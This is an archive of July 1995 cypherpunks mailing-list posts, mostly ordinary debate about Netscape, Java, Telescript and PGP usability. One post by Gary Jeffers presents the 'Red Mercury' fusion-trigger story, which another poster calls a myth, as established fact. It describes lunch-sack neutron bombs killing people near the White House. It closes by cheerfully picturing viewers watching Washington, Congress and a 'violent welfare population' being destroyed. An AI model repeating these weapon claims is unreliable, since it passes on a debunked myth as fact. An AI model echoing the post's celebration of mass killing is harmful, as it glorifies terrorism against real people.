> technically superior and deserves to be as popular as Netscape and simiar
> approaches, but reality is reality.

All dogmas are ultimately Bad Things.  But dogma gets stuff done in the 
short run.  NetScape deserves to be popular; they followed the truth that 
most PC users like "pretty" better.  And they made the best "pretty" 
software.

> (And I could be wrong on the way things will unfold. All I'm saying is that
> technology is a moving target, that plans have to change, and that ease of
> use will likely win out over technical sophistication. Folks who think the
> stronger technology will inevitably win should pick up a copy of a
> 15-year-old book called "The Soul of a New Machine," by Tracy Kidder.)

Agreed.  It's still too early to tell.  This is like 100AD and we're 
trying to predict the Catholic Church of the twentieth century, trying to 
figure out fifteen years down our road.   I really believe that's how 
fast we're moving right now, and we have to hit as many targets as we can.

Jon
------------------------------------------------------------------------------
Jon Lasser                <jlasser@rwd.goucher.edu>            (410) 494-3253 
          Visit my home page at http://www.goucher.edu/~jlasser/
  You have a friend at the NSA: Big Brother is watching. Finger for PGP key.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@imsi.com>
Date: Thu, 20 Jul 95 13:28:17 PDT
To: monty.harder@famend.com (MONTY HARDER)
Subject: Re: Free The World Web Server project.. :)
In-Reply-To: <8AD9224.00030001F5.uuout@famend.com>
Message-ID: <9507202028.AA05535@snark.imsi.com>
MIME-Version: 1.0
Content-Type: text/plain



MONTY HARDER writes:
>   After putting the appropriate tally mark on the sheet for the day's
> mail, and sending out the response letter, yep. I don't expect Jan Meyers
> to personally =ever= see my mail to her office. I only expect her
> gruntlings to put that mark under "no" for the ______ Bill.

You don't grok the "astroturf" concept. They'll note that letters look
too similar and discount them.

>   But "folx" is exactly the kind of thing that tells the staffer that it
> is =not= a form letter,

You are right -- indicates someone who thinks it makes them a K00L
D00D. I shan't say more.

.pm




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anonymous-remailer@shell.portal.com
Date: Thu, 20 Jul 95 16:36:15 PDT
To: cypherpunks@toad.com
Subject: Re: DOVE/Red Mercury doom U.S. Super State?Red Mercury myth
Message-ID: <199507202335.QAA13609@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain



On Thu, 20 Jul 1995, Gary Jeffers wrote:

>    Red Mercury means Antimony Mercury Oxide. This compound
> looks rather
> harmless but it is not. This compound is very technically
> difficult to

This myth shows up on sci.chem every few months or so.  There is no such 
thing.

-Rat




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Joseph Block <jpb@shadow.net>
Date: Thu, 20 Jul 95 13:37:31 PDT
To: pfarrell@netcom.com
Subject: Re: Netscape the Big Win
In-Reply-To: <40697.pfarrell@netcom.com>
Message-ID: <199507202041.QAA21408@shadow.net>
MIME-Version: 1.0
Content-Type: text/plain


re:
> The current trend is to bundle all types of functionality into huge
> monolithic programs. Add mail to netscape, add encryption, add ...
[snip] 
> Why are all-in-one programs so preferable to using the windowing
> capabilities that are built into every X-window, Mac or Windows system?
> 
> Why not use the best mail client, another best webcrawler, and yet another
> news reader?
[snip] 
> With components, it wouldn't be hard to have a universal
> Encryption/Signature module. It would get arround any propriatary
> restriction that vendors may or may not try to enforce ("can Netscape be
> extended or not" becomes moot).
> 
> Is clicking on another icon really too hard?

Um, thats what I do on my Mac.  The smoothness of Internet Config+Newswatcher
+IceTEE+Eudora+Anarchie is beautiful to watch - I command-click a URL while
reading mail and the right app magically takes care of everything.

[begin annoyed complaints here]

If only MacPGP were so easy.  MacPGP is such a pain in the ass for me that
I'm 90% done configuring a Linux box so I can sign/encrypt without hassle.
There are other planned uses for valkyrie, of course, but the triggering
factor is encryption.  I'd much rather keep PGP and my keys on my Duo that
I take everywhere, but that'd be too easy.

First I had troubles with it crashing my machine, then it wouldn't extract keys,
then it would extract keys but my buddy with the dos machine couldn't import
them (and yes, I had it set to ascii armor them).  The litany goes on and on.
I suspect that it is RamDoubler that MacPGP hates, but am unwilling to give it
up - I *need* that extra 12MB for work.

I'm not a moron; I got it working well enough under DOS to have taught
several friends to use it, it just doesn't like my Mac.

Does anyone have any information on when 3.0 is going to be released?  I'd
rather fight with a buggy new version than a buggy old version that will be
superceded RSN.

I'm also interested from an OpenDoc standpoint - I just got the OpenDoc DR2 CD
and would really like to make a PGP aware OpenDoc container.  I have time to
code now, but won't after September.



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ray Cromwell <rjc@clark.net>
Date: Thu, 20 Jul 95 13:45:51 PDT
To: tcmay@sensemedia.net (Timothy C. May)
Subject: Re: Netscape the Big Win
In-Reply-To: <ac3402ec0a0210046af5@[205.199.118.202]>
Message-ID: <199507202044.QAA14974@clark.net>
MIME-Version: 1.0
Content-Type: text/plain


Tim May wrote:
> I am sorry that some folks heavily committed to the Linux route, or to
> Emacs, or to GNU/FSF, or to other approaches feel that their work is
> technically superior and deserves to be as popular as Netscape and simiar
> approaches, but reality is reality.
> 
> (And I could be wrong on the way things will unfold. All I'm saying is that
> technology is a moving target, that plans have to change, and that ease of
> use will likely win out over technical sophistication. Folks who think the
> stronger technology will inevitably win should pick up a copy of a
> 15-year-old book called "The Soul of a New Machine," by Tracy Kidder.)

   I agree wholeheartedly with this. When General Magic first released
the Telescript white paper, I was really hot for the technology. I tried
to become a developer, I sent mail to every General Magic employee on the
net I saw posting (one guy even CC'ed me accidentally to his manager
saying they should hire me). I did searches in the media for any
mention of it. Harry Hawk even had dinner with the VP of Product Development
at General Magic. Alas, they would not give out alphas/betas of the 
development environment, which is all the same, because they don't know
how to market Telescript and make it a defacto standard. Instead of charging
for the interpreter/server, they should have given away the servers and
development stuff for free, or near free, and made their money by selling
services and clients (personal digital assistants using Magic Cap and
Telescript). The result is that no one uses Telescript except AT&T.
If I had gotten my hands on Telescript, I would have wasted lots of time
and effort on a failed product (failed in my eyes, because of its potential)
[lesson: proprietary programming languages fail unless they come embedded
within a killer consumer application]

    Then I got into Safe-Tcl, which is a little more promising, but still
a failure because there was no "killer app" which used it and which would
encourage its incorporation into other servers and clients. HTML would
have failed were it not for Mosaic. I was on the Web when it only had a line
mode browser and it was about as exciting as Gopher.

   I think Sun has taken the right approach with Java. Giving out Alphas
and Betas for free with source code. Encouraging heavy porting, and
incorporating it into a "killer app" (HotJava). They will make money
by licensing and selling tools and environments for Java, but their biggest
success will be that it will become the defacto "enabled content" language.

   Java still lacks what Telescript has (the ability to checkpoint execution
state and migrate execution across servers seamlessly), but what Telescript
has that Java doesn't isn't enough to make people wait for it, or pay
lots of money to be developers for.

   I could be wrong about how successful Java will be, but my confidence
factor is high.

-Ray



    





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Hal <hfinney@shell.portal.com>
Date: Thu, 20 Jul 95 16:46:31 PDT
To: cypherpunks@toad.com
Subject: Re:  Java (was Netscape: the big win)
Message-ID: <199507202345.QAA16459@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


So, what would be a "cypherpunk" thing you could do with Java?  I know
I can use it to download little applets to my system to do animations.
What can it do to enhance my privacy?  What would be the Java equivalent
of PGP?

Hal




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: gjeffers@socketis.net (Gary Jeffers)
Date: Thu, 20 Jul 95 14:51:40 PDT
To: cypherpunks@toad.com
Subject: DOVE/Red Mercury doom U.S. Super State?
Message-ID: <199507202345.SAA24056@mail.socketis.net>
MIME-Version: 1.0
Content-Type: text/plain


            DOVE/Red Mercury dooms U.S Super State?     

   The first part of this post deals with Red Mercury. The
remainder
deals generally with cheap weapons of mass destruction and
their
proliferation amoung small groups.

   Red Mercury means Antimony Mercury Oxide. This compound
looks rather
harmless but it is not. This compound is very technically
difficult to
synthesize in its dangerous state. I suspect that the
compound is more
complex than its formula suggests. According to Spin
magazine, it is
not exactly an explosive but goes through a chemical
transformation
that releases MUCH more power (energy/time) than high
explosives. It was
discovered in Russia and is currently being produced there.
DOVE is a
code name for an American device that would have used Red
Mercury.

   The unique property of Red Mercury is that it releases so
much power
that it can be used as a trigger for miniature fusion bombs!
And appar-
ently has been.

   Most of this material is from a booklet by Dr. Gary
North, called
BILLS FROM BEYOND THE GRAVE - chapter 7 - Khomeini's Bill.
This booklet
is a recent promotional for North's REMNANT REVIEW.

Remnant Review
824 East Baltimore Street
Baltimore, MD
21202


The following text is mostly information quoted from North's
booklet
in which he gets his info from Sam Cohen - The man who came
up with
the idea of the neutron bomb in the late 1950's.

--------------------start  North----------------------------
--------
The DOVE project was active at least since 1958 at the
Livermore nuclear
weapon laboratory. "The proposed device was part of the
lab's peaceful
explosive program, e.g., underground drilling & exploration.
It contained
no fissionable material. That is, it was not detonated by an
atomic bomb.
It was to be composed of deuterium & tritium: heavy hydrogen
which is
used in the hydrogen bomb. It would have the effect of 10
tons of TNT.
It would have been an extremely low-yield weapon."

   Cohen concluded that it would also serve as a weapon. It
would kill
enemy troops with radiation out to several hundred yards,
but without
the destruction of buildings and without serious radioactive
contamina-
tion. These devices, if practical, could be turned out by
the
hundreds at very low nuclear cost, since they contained no
fissionable
material. Here was a completely different approach to
neutron bombs.

   Not long after, he told a key Presidential advisor about
it. This man
has been a high-level advisor in the field of nuclear
disarmament for
half a century. The man understood the problem: if such a
weapon could
be built, any nuclear-proliferation treaty would become
unenforceable-
a nightmare in his view. As Cohen told me, shortly
thereafter he was
forbidden access to this project, which the government
killed by 1960.

   Meanwhile, the Soviet Union's research program continued.
Even before
Liverpool began its research, the USSR had been involved in
a similar
project. A 1957 paper by a Soviet weapon designer described
experiments
done in 1952. In 1961, a Soviet colonel described in Red
Star the mili-
tary effects of such devices. Cohen realized that the
Soviets were not
talking about DOVE; they were developing it.

   Now jump ahead about three decades. In 1992, Russian
General
Ye Negin stated that Russia had begun producing low-yield
nuclear
devices, but double what previous tactical nuclear weapons
have been.
He stated that this had been accomplished with a hundredfold
reduction
in weight. Cohen cites a 1990 statement by Viktor Mikhailov,
who is now
the Russian Minister of Atomic Energy: "You can drop a
couple of hund-
red little bombs on foreign territory, the enemy is
devastated, but for
the aggressor there are no consequences."

   This means the Soviets - now called Russians - developed
the long-
missing trigger: the detonation technology. Cohen calls this
new material
Red Mercury: an antimony, mercury oxide. But U.S.
intelligence services
have officially denied that any relevant evidence for such a
device
exists. Remember this rule: "No rumor should be considered
true till its
denied."

                A NEUTRON BOMB IN A LUNCH SACK

   In my interview with Cohen, he described eating his lunch
in the park
across the street from the White House, just a few hundred
yards away.
If a tritium-based, red-mercury detonated device exists, he
speculated,
it would weigh perhaps five pounds. A person could sit down
on a park
bench, casually eat his lunch (or pretend to), deposit the
lunch sack in
a trash can, and walk away. At some predetermined moment,
the bomb would
explode. Everyone above ground in the White House would be
killed. So
would most people within several hundred yards of the
explosion in every
direction.

   His other scenario is similar: a brown paper bag
deposited between the
two World Trade buildings in New York City. Tens of
thousands of people
could die.

   The issue here is terrorism. These devices could be
tested in under-
ground ficilities. They would give off no detectable
radiation above
ground when exploded. Their low-level explosive force could
not be moni-
tured. The killing power of these devices is not in the
force of the
explosion. It is the neutrons that do the damage. They also
blow out
computers: electromagnetic pulsation (EMP).

   Because they are very light and undetectable, these
devices could be
smuggled easily across a border. Hide one in a coffee can.

   How cheaply could they be produced? Cohen cannot be sure
since he does
not know the precise nature of the detonating mechanism. But
even at the
cost of $1 million or more, this would be irrelevant
compared with the
consequences. A DOVE is a cheap weapon.

            THE GOVERNMENT HAS TO DENY THIS STORY

   The government faces two problems. (1) The 1968 Non-
Proliferation
Treaty does not deal with tritium. It deals only with
fissionable
materials, e.g. plutonium. (2) The Anti-Ballistic Missile
(ABM) defense
treaty is now threatened. By exploding a DOVE-type weapon in
the atmo-
sphere, a defensive-minded nation could disrupt incoming
nuclear
missiles. When detonated, these DOVE devices give off
virtually no
detectable radiation: no fissionable material. Any terrorist
nation
could test such a device, and the West would not know about
it. This
means that the two key nuclear war-related treaties of the
U.S. are tech-
nologically dead. They can be violated at will. The State
Department
dares not admit this.
---------------------------end North------------------------
--------

   North thinks that Iran will be the country that attacks
the U.S.
with these bombs.






SOME MORE REFERENCES TO RED MERCURY

---------------------start----------------------------------
--------
Fool's mercury. (synthesized red mercury created by
Promecologia)
The Economist, May 22, 1993 v327 n7812 p76(1).

Abstract: Promecologia claims to be able to synthesize red
mercury, and
 it has a $24.2 billion deal to sell the mercury to API
International.
But this deal has gone awry, because of accusations that the
sale is
only an attempt to launder money.

Companies: Promecologia - Contracts
API International - Contracts

AN: 13768250


-------------------------end--------------------------------
------

----------------------------start---------------------------
--------
... But only fools still hunt for elusive red mercury.
New Scientist, June 06, 1992 v134 n1824 p10(1).

Author: William Brown

Subjects: Mercury compounds - Reports Fraud in science -
Reports

Gov't Agencies: United States. Department of Energy -
Reports

AN: 12747905
(This may be a disinformation article. Gary Jeffers)
--------------------------end-------------------------------
-----

--------------------------start-----------------------------
----
Black holes of red mercury. (views of Gennady Brubulis,
retired
State Secretary)

Moscow News, August 13, 1993 n33 p11(1).

Author: Vladimir Orlov

Abstract: The existence of "red mercury," a mercury
antimonite that is
produced and exported by the USSR to countries such as the
US, France,
and Iraq for use in the manufacturing of nuclear weapons, is
investi-
gated and analyzed. The substance is a brownish-steel power
or a red
liquid, and costs between 320 and 380 dollars per gram.
Russian chemists
and other specialists in the US Department of Energy have
denied the
existence of this substance.

Subjects: Mercury - Research

AN: 14519163
(Its probable that this article is in English. Gary Jeffers)
------------------------------end---------------------------
---------

An article titled Red Mercury was printed in (I'm pretty
sure)
Spin magazine some time ago.


From WAR AND ANTI-WAR by Alvin and Heidi Toffler - Warner
Books

----------------------Start---------------------------------
---------

               WALL STREET AND WARLORDS

   All this leads some pessimists to doubt that nuclear arms
can be
controlled at all. Few match the gloom of Carl Builder, a
statigic
analyst at the RAND Corporation. Builder's pessimism is
regarded as
extreme by many of his colleagues, but as the first director
of nuclear
safeguards for the U.S. Nuclear Regulatory Commission, he
can hardly be
dismissed. At one time Builder was totally responsible for
the security
of all nuclear materials in civilian hands in the United
States, some of
it bomb-grade stuff.

   The main problems of the future, he believes, will not
arise from
nation-states at all, but from those we called "global
gladiators" in
our book POWER SHIFT. These are terror organizations,
religious move-
ments, corporations, and other nonnational forces - many of
whom, he
says could gain access to nuclear weaponery.

   Listening to him one imagines the Irish Republican Army
announcing
that it has accquired its own nuclear bomb. A call to the
BBC warns that
"if British troops do not evacuate Northern Ireland withing
seventy-
two hours, a nuclear device will..."  The bumblers who
devastated parts
of New York's World Trade Center might have oblierated Wall
Street had
someone cleverer supplied them with a tactical nuke.
Someday, Builder
believes, even outfits like the Medellin cocaine cartel may
be able to
build their own nuclear weapons.

   According to a report in The Economist, "There have
already been more
than 50 attemps to extort money from America with nuclear
threats, some
frighteningly credible."  Worse yet, to the current list of
possible
threats an additional one, largely overlooked, now has to be
added. Not
only governments, terrorists, and drug barrons, but warlords
may now be
searching for nuclear weapons.

   There are, often ignored by the arms-control community,
private armies
in many parts of the world under the control of local
business-cum-
political thugs. The equivalent of warlords can be found
from the
Philippines to Somalia and the Caucasus, wherever central
government
control is weak. More and more of these private armies are
spinging up as
the national forces of the old Soviet Union disintegrate.
Moreover, there
are reasons to believe that mafia-like business groups in
Russia today,
feed, house, cloth, and control whole units of the former
Red Army. In
short, private armies, mercenaries, and First Wave
warlordism are all
making a comeback. The idea of nuclear weapons under the
control of these
local generalissimos should send a sudder down our
collective spine.

   Builder's proliferation scenario, however, forces us to
confront the
extreme. Like gunpowder, he says, "Nuclear weapons are going
to diffuse..
I'm going to go even further and say, even if not in my
lifetime, per-
haps, but in the forseeable future, [that they] are going to
proliferate
down to individuals. It will be possible for an individual
to make a
nuclear device from materials which are in commerce."

   Mafia families, Branch Davidian cultists, archaeo-
Trotskyite group-
uscules, Sendero Luminoso Maoists, Somalian or Southeast
Asian warlords,
Serbian Nazis, and even, perhaps, individual loonies could
hold whole
nations at ransom. Worse yet, Builder believes, "An opponent
cannot be
deterred by the threat of nuclear weapons if that opponent
has no defin-
able society to threaten." Thus, he says, a "terrifing
asymmetry" looms
ahead.
--------------end of WAR AND ANTIWAR------------------------
-----------

   Another threat is cheap biological warfare. A few years
ago in a
popular science magazine, a scientist was describing the
near future
threat of biological weapons. Amoung the things he stated
was 1. while
only two sites in the world house smallpox samples, its
genome is known
and it can be made in a gene sequencer. 2. As bio science
advances,
plagues can be manufactured by smaller groups of people. 3.
A plague
could be tailored to strike only a certain racial group in
only a
particular part of the world. The part of the world
described by humi-
dity, temp., climate, etc..

                       CONCLUSION

   The world is not going to be dominated by a one world
state. Tech-
nology dictates that weapons of mass destruction are going
to find their
way into the hands of smaller and smaller groups. No longer
will giant
states be able to say "you do what I say." Sort of a "Don't
tread on me"
world. "God created man. Samuel Colt made men equal." - AND
cheap weapons
of mass destruction will make political entities equal
regardless of
size.

  Other books that pretty much reach these conclusions are:
The
GREAT RECKONING by James Dale Davidson and Lord William
Rees-
Mogg Simon & Schuster; BLOOD IN THE STREETS by same
writters;
and BASEMENT NUKES by Erwin S. Strauss - Loompanics
Unlimited.

Relevance to CYPHERPUNKS: Weaponery decides size of viable
independent
political groups & their degree of independence. This will
decide much
of the nature of private communications. Also, Cypherpunks
was sort of
down about the increasing control of the U.S. superstate. I
think this
will cheer them up.

& Finally: In the old Feudal days, wars weren't so bad. The
nobility
would fight while the peasants watched nearby & cheered the
sport.
Won't it be just grand when we sit in front of our tv's with
cherry
cokes & popcorn & watch the "horrible" news reports of the
destruction
in Washington D.C. in which the dreaded two-headed Clinton
monster was
killed and various paramilitary headquarters, the IRS,
Congress,
lobbyists, lawyers, the Federal Reserve and a violent
welfare population
were destroyed. Set VCRs on record!

                                             PUSH EM BACK!
PUSH EM BACK!
                                             WWWAAAYYY
BBBAAACCCK!
                                             BBBEEEAAATTTT
STATE!
                                             Gary Jeffers







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ray Cromwell <rjc@clark.net>
Date: Thu, 20 Jul 95 14:01:05 PDT
To: jlasser@rwd.goucher.edu (Jon Lasser)
Subject: Re: Netscape the Big Win
In-Reply-To: <Pine.SUN.3.91.950720161632.12511A-100000@rwd.goucher.edu>
Message-ID: <199507202059.QAA18820@clark.net>
MIME-Version: 1.0
Content-Type: text/plain


Jon Lasser wrote:
> And from what I've heard about HotJava (not seen it yet, can't comment 
> strongly) there needs another jump in PC power before it would be useful 
> at the home level.  Part of why we were stuck with DOS for so long is 
> that it was what got the job done when the revolution happened.  For that 
> reason, I agree that HTML/Integrated browser solutions are what we're 
> looking at, and at the same time don't have strong hopes for HotJava, 
> though I would like to see it succeed.

   HotJava runs fine on a 486/33 with 16mb running WinNT 3.5. 486s are
pretty much standard. 1995 and '96 will be "the year of the pentium"
Entry level systems are now Pentium 90s with PCI and 64-bit video. Pentium
120 systems now cost less than my 486/66 system did a year ago. HotJava
is compiled into efficient byte-code with the option to be translated
to machine code at run time. This is the same principle behind the Newton.
Since the majority of the CPU time is spent in native-C code function
calls to the user interface, and network latency is high, the "slow"
interpreted code is hardly noticed. In fact, I wouldn't call the
Java runtime slow, it beats the performance of many Lisp interpreters
which have been adequate for "home" users. (e.g. Emacs Lisp) HotJava is
not meant for writing applications to decode MPEG in real time. It's best
use is for interactivity on web pages. It doesn't take a powerhouse
of CPU to put up a slider, "sleep" for an event, and they call a ScrollList()
routine. There's going to be a huge use of Java for doing sales catalogs
and online ordering on the web.

> most PC users like "pretty" better.  And they made the best "pretty" 
> software.

  Netscape software is not just a pretty user interface, it also has the
best layout algorithms I've seen of browsers. That's some pretty hefty
dynamic programming there. Mosaic and Arena frequently produce poor
or incorrectly formatted pages. (or less optimal pages than I've seen
Netscape)
-Ray




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Patrick J. LoPresti" <patl@catfish.lcs.mit.edu>
Date: Thu, 20 Jul 95 14:12:29 PDT
To: tcmay@sensemedia.net (Timothy C. May)
Subject: Re: Netscape the Big Win
In-Reply-To: <ac33f977080210043230@[205.199.118.202]>
Message-ID: <199507202112.RAA21906@catfish.lcs.mit.edu>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

>>>>> "tcmay" == Timothy C May <tcmay@sensemedia.net> writes:

 tcmay> Seriously, the world is what the world is. I really don't care
 tcmay> about "FSF" one way or the other, and will join the rest of
 tcmay> the world (apparently) in using Netscape.

I am not ignoring the reality of the situation.  I was not arguing
with your main point, which was that Netscape is going to take over
the world.  We all agree on that, I think.

My point was that your criticism of existing efforts is inappropriate.
I submit that the tools you marginalize are more responsible for
current PGP usage than everything you have ever written combined.  (I
intend no more offense with my comments than you do with yours; I am
just trying to make my point.)

 tcmay> And yes, I am "marginalizing" the work that anyone does on
 tcmay> "fringe" projects like Linux, which will likely always remain
 tcmay> in the ghetto of Unix hackers who want a cheap Unix running on
 tcmay> their cheap 486 boxes...it just ain't gonna take over inside
 tcmay> corporations or amongst the many folks like me.

(Tangential point) I think you underestimate Linux, which has an
installed base of a million or so systems.  But that is a different
topic entirely.

 tcmay> Frankly, one of the great boons of my current setup is that I
 tcmay> can completely get away from Unix tools and commands, away
 tcmay> from my Unix shell account at Netcom, away from the arcane
 tcmay> commands that vary from program to program, away from tin and
 tcmay> elm and emacs...my fingers are already forgetting the emacs
 tcmay> commands!

(Another tangential point, and blatant plug) To verify a PGP signature
from within Emacs, I click on the "Mailcrypt" menu bar item and select
"Verify Signature".  When I lack the public key of the signer,
Mailcrypt offers to fetch it for me from BAL's Web interface.  I
answer "y", and a few seconds later I see the output of PGP on the
public key (so I can check the key signatures).  I confirm that I want
to add the key to my ring, and then the original signature check
completes.

It isn't Netscape, but it isn't rocket science, either.  I agree,
though, that no matter what the interface looks like, it won't be
adopted by the masses if it doesn't run on Windows and Macintosh.

 tcmay> And the newsreader is a matter of taste...it does all I want
 tcmay> it to do, and I'm a fairly heavy reader of News and
 tcmay> contributor to Usenet groups. I survived with "tin" for
 tcmay> several years, so anything is possible.

(Yet another tangential point) If you ever try a news reader with
score files, I think you would be converted.  Especially adaptive
score files.

 tcmay> I don't think the packages I "denigrate" are the key to the
 tcmay> future widespread use of crypto. Look at the actual usage
 tcmay> patterns.

Yes, look at the current usage patterns for PGP.  It's far from being
everyone, but it is even farther from being no one.  Existing
interfaces do make a difference.

 tcmay> Please, your insulting tone ("your musings," "try writing some
 tcmay> code..") is uncalled for. You have your views, I have mine.

Point taken.

You just seemed to be playing the armchair quarterback, telling
developers that they are wasting their time when they are, in fact,
doing everything they can do at present.

Nevertheless, we are, I think, largely on the same team.  I apologize
for my tone.

When it becomes feasible to do what you are asking for Netscape, I am
sure that someone will do it.  At the moment, it is largely out of our
hands, since the Netscape interface is totally controlled by Netscape
Communications...

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Processed by Mailcrypt 3.3beta, an Emacs/PGP interface

iQCVAwUBMA7GqHr7ES8bepftAQEOAwQA0fYoxk1u8lZOUuHRYE+m0ZHpXAQ33mGB
nS4ifVWIW+XLRyVX9Cb3AQbGHottoLt7kYnAmxXuSClCYvwFoC9yTV7aFM7Pe0gj
HHutvRbfd/Cqa8mqW3HnKfDLX9ZYWOX4b9Y5x5tfw6cVpPphHV98Jj18bP72I2vh
+fDUbNlVuEY=
=KeI1
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: cman@communities.com (Douglas Barnes)
Date: Thu, 20 Jul 95 17:19:01 PDT
To: Phil Fraering        <pgf@tyrell.net>
Subject: Re: Java (was Netscape: the big win)
Message-ID: <v02120d01ac34a93e85dc@[199.2.22.120]>
MIME-Version: 1.0
Content-Type: text/plain


>Does anyone here have any figures on how much memory Java takes up
>when running its typical tasks?
>

These are real ball-park figures based on looking at "free memory"
from vmstat from several instances of launching, running, then exiting
from the listed programs:

Java compiler (written in Java), compiling big program: 2.5 MB

HotJava browser (written in Java), after running some applets: 4.0 MB

"Hello world" Java program (no GUI): 800K







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Phil Fraering        <pgf@tyrell.net>
Date: Thu, 20 Jul 95 15:42:33 PDT
To: gate@id.WING.NET
Subject: Investigate Your Federal Building :)
In-Reply-To: <Pine.3.89.9507191717.A8562-0100000@dialin1.wing.net>
Message-ID: <199507202226.AA14478@tyrell.net>
MIME-Version: 1.0
Content-Type: text/plain


You know, if you see Moulder or Scully, tell them I said hi.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Phil Fraering        <pgf@tyrell.net>
Date: Thu, 20 Jul 95 15:37:14 PDT
To: cypherpunks@toad.com
Subject: Java (was Netscape: the big win)
In-Reply-To: <doug-9506201613.AA002518293@netman.eng.auburn.edu>
Message-ID: <199507202231.AA15197@tyrell.net>
MIME-Version: 1.0
Content-Type: text/plain



Does anyone here have any figures on how much memory Java takes up
when running its typical tasks?

Phil




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Phil Fraering        <pgf@tyrell.net>
Date: Thu, 20 Jul 95 15:37:47 PDT
To: cypherpunks@toad.com
Subject: And another thing...
Message-ID: <199507202233.AA15359@tyrell.net>
MIME-Version: 1.0
Content-Type: text/plain



As usual, one final question came to mind right after
sending the last message:

Why is Java the next hot thing instead of Telescript?

Was Telescript ever opened up for general use or was it
mainly used for AT&T's Personalink network?

Phil




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Patrick J. LoPresti" <patl@catfish.lcs.mit.edu>
Date: Thu, 20 Jul 95 14:37:03 PDT
To: tcmay@sensemedia.net (Timothy C. May)
Subject: Re: "Cypherpunks Write Code" as a Putdown
In-Reply-To: <ac3406e80c0210045a87@[205.199.118.202]>
Message-ID: <199507202136.RAA22319@catfish.lcs.mit.edu>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

I have already explained my comments in another thread, but I figure I
should respond to this anyway.

>>>>> "tcmay" == Timothy C May <tcmay@sensemedia.net> writes:

 tcmay> At 5:25 PM 7/20/95, Patrick J. LoPresti wrote:
 >> If it is ever feasible to do what you suggest, someone will do it;
 >> your musings will have no effect on that.  If you want to make a
 >> difference, try writing some code yourself...

 tcmay> In my posting on why I think Netscape and related operating
 tcmay> environments represent the likeliest targets for widespread
 tcmay> crypto use (the "big win" I used in my title), I did not whine
 tcmay> that others ought to write code for me.  I said that this is
 tcmay> where users were going in massive numbers.

That is not all you said; you also suggested that existing interfaces
for "Tin, Pine, Elm, Joe, Emacs, etc." were a waste of time.

 tcmay> Take it or leave it, as an analysis, but the "try writing some
 tcmay> code" is a meaningless insult.

I have apologized for the insulting tone, but I do not feel the
comment was meaningless.  If you are going to criticize my development
efforts, I think it is fair for me to ask, "And what have *you* done?"

The point being, of course, that the criticism itself is unwarranted;
not to make a meaningless insult.

 tcmay> In short, the insulting tone of many Cypherpunks these days is
 tcmay> saddening.

It was a specific response to an insult of my (and others') work.
Again, I apologize.

 tcmay> I plan to continue to speak my mind, to point out what I think
 tcmay> are the more important routes to a desirable future, and to
 tcmay> criticize what I think are dead ends and ghettoized
 tcmay> approaches.

I would hope you would keep the forward-looking vision while ditching
the critical tone.  Those "ghettoized approaches" are the best we have
at present, and they are responsible for the widespread use of PGP,
such as it is.

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Processed by Mailcrypt 3.3beta, an Emacs/PGP interface

iQCVAwUBMA7MWnr7ES8bepftAQHgRQP+O60BcHGWSiUETnePX9DrzDKOBfA7VNPB
900twzEO+o21RVBGMePn3zCc2Z70ejsKmgndH/EN74SWt9Ot03BWyWzIFj67BVua
GhWhuyeBXTBGe3ZzfKFTmNUqKNQocj5UxD6CDj/2O5powYjYLCzKBHZTI3UGyE57
MjBY/YclZRw=
=FPXO
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Phil Fraering        <pgf@tyrell.net>
Date: Thu, 20 Jul 95 16:01:28 PDT
To: cypherpunks@toad.com
Subject: Netscape the Big Win
In-Reply-To: <ac340c990d021004b0d4@[205.199.118.202]>
Message-ID: <199507202257.AA17742@tyrell.net>
MIME-Version: 1.0
Content-Type: text/plain


Tim May wrote:

   Just to clarify, you mentioned "useful at the home level." I can't speak
   for Ray, but I certainly didn't mean HotJava (or PowerObjects, or OpenDoc,
   or Agents tools, etc.) would be used at "the home level."

   Such tools would likely be used at the programming level.

The tools you mention are either interpreted or gain their
functionality when used at the "home" level.

OLE (gag me with a forklift!) seems to be used more by users to
integrate their own environments together because the programmers
forgot to.

Just speaking as a humble and frustrated Windows 3.1 user.

Phil





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: cman@communities.com (Douglas Barnes)
Date: Thu, 20 Jul 95 18:05:38 PDT
To: stewarts@ix.netcom.com (Bill Stewart)
Subject: Re: Java (was Netscape: the big win)
Message-ID: <v02120d06ac34bad6a82c@[199.2.22.120]>
MIME-Version: 1.0
Content-Type: text/plain


>At 05:18 PM 7/20/95 -0800, Douglas Barnes wrote:
>>Java compiler (written in Java), compiling big program: 2.5 MB
>>HotJava browser (written in Java), after running some applets: 4.0 MB
>
>Believable for this sort of thing.
>
>>"Hello world" Java program (no GUI): 800K
>Yow!  Does this mean I'd have to download an 800K applet to my browser
>just to get it to say "Hello, World"?  Or is this a complete standalone
>program, much larger than a typical applet?

Uh, no, this is a standalone Java program (includes interpreter,
language library, etc.)

Applets are treated by a browser in the same way that a GIF is treated
(more or less); the browser may have to grab more memory to take in
a big one, but that memory can be reclaimed when the user moves on to
a new page.

Applets run as a thread within a multi-threaded browser, they don't
have their own processes, etc.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: stewarts@ix.netcom.com (Bill Stewart)
Date: Thu, 20 Jul 95 18:14:21 PDT
